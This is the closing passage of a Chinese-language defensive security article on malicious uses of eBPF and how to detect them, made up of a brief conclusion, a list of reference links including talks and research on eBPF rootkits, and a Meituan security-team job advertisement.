随着云原生快速发展，eBPF实现软件、运行环境会越来越多，而eBPF的恶意利用也会越来越普遍。从国内外的情况来看，国外对这个方向的研究远比国内超前，笔者再次呼吁大家，网络安全产品应当尽快具备eBPF相关威胁检测能力。

这里，笔者跟大家探讨了基于eBPF技术的恶意利用与检测机制。在文章之初，提到eBPF在防御检测产品研发、工程建设等，我们将在下一篇跟大家分享，敬请期待。

文末链接?

链接-1:https://www.blackhat.com/us-21/briefings/schedule/#with-friends-like-ebpf-who-needs-enemies-23619

链接-2:https://defcon.org/html/defcon-29/dc-29-speakers.html#path

链接-3：https://blog.tofile.dev/2021/08/01/bad-bpf.html

链接-4:https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#unprivileged-bpf-disabled

链接-5:https://lwn.net/Articles/853489/

链接-6:https://lwn.net/Articles/854386/

链接-7:https://github.com/ehids/ehids-agent/blob/master/kern/bpf_call_kern.c

链接-8:https://github.com/ehids/slide/blob/master/security/2021-Secure_Namespaced_Kernel_Audit_for_Containers.pdf

链接-9:https://www.kernel.org/doc/html/latest/userspace-api/ebpf/syscall.html

链接-10：https://man7.org/linux/man-pages/man8/tc-bpf.8.html

链接-11:https://github.com/cylance/eBPF_processor

链接-12:https://blogs.blackberry.com/en/2021/12/reverse-engineering-ebpfkit-rootkit-with-blackberrys-free-ida-processor-tool

链接-13:https://github.com/iovisor/bcc/blob/master/docs/reference_guide.md#11-lsm-probes

链接-14:https://github.com/libbpf/libbpf-bootstrap

链接-15:https://nakryiko.com/posts/bpf-core-reference-guide/

参考资料??

1. Creating and Countering the Next Generation of Linux Rootkits:?DEF CON 29 - PatH - Warping Reality: Creating and Countering the Next Generation of Linux Rootkits

2. DEFCON 29 - eBPF, I thought we were friends：https://www.youtube.com/watch?v=5zixNDolLrg

3. eBPF的各种技术应用PDF集合:?https://github.com/ehids/slide

4. Offensive BPF: Malicious bpftrace :?https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/

5. Bad BPF - Warping reality using eBPF：https://blog.tofile.dev/2021/08/01/bad-bpf.html

6. Lifetime of BPF objects:?https://facebookmicrosites.github.io/bpf/blog/2018/08/31/object-lifetime.html

7. BPF程序（BPF Prog）类型详解：使用场景、函数签名、执行位置及程序示例:https://arthurchiao.art/blog/bpf-advanced-notes-1-zh

8. Features of bpftool: the thread of tips and examples to work with eBPF objects:?https://qmonnet.github.io/whirl-offload/2021/09/23/bpftool-features-thread/

9. Reverse Engineering Ebpfkit Rootkit With BlackBerry's Enhanced IDA Processor Tool:?https://blogs.blackberry.com/en/2021/12/reverse-engineering-ebpfkit-rootkit-with-blackberrys-free-ida-processor-tool

10. Creating and countering the next generation of Linux rootkits using eBPF:?Creating and countering the next generation of Linux rootkits using eBPF?Pat Hogan

11. eBPF Syscall:?https://www.kernel.org/doc/html/latest/userspace-api/ebpf/syscall.html

12. Cilium eBPF实现机制源码分析:?https://www.cnxct.com/how-does-cilium-use-ebpf-with-go-and-c/

13. ebpfkit is a rootkit powered by eBPF:?https://github.com/Gui774ume/ebpfkit

招聘??

美团信息安全部，安全研发专家（主机安全方向）、安全研发专家（RASP方向）、WEB研发架构师（JAVA语言）等50余个岗位正在热招中，欢迎投递简历至EDP.src@meituan.com，更多岗位详情，点击下方图片获取！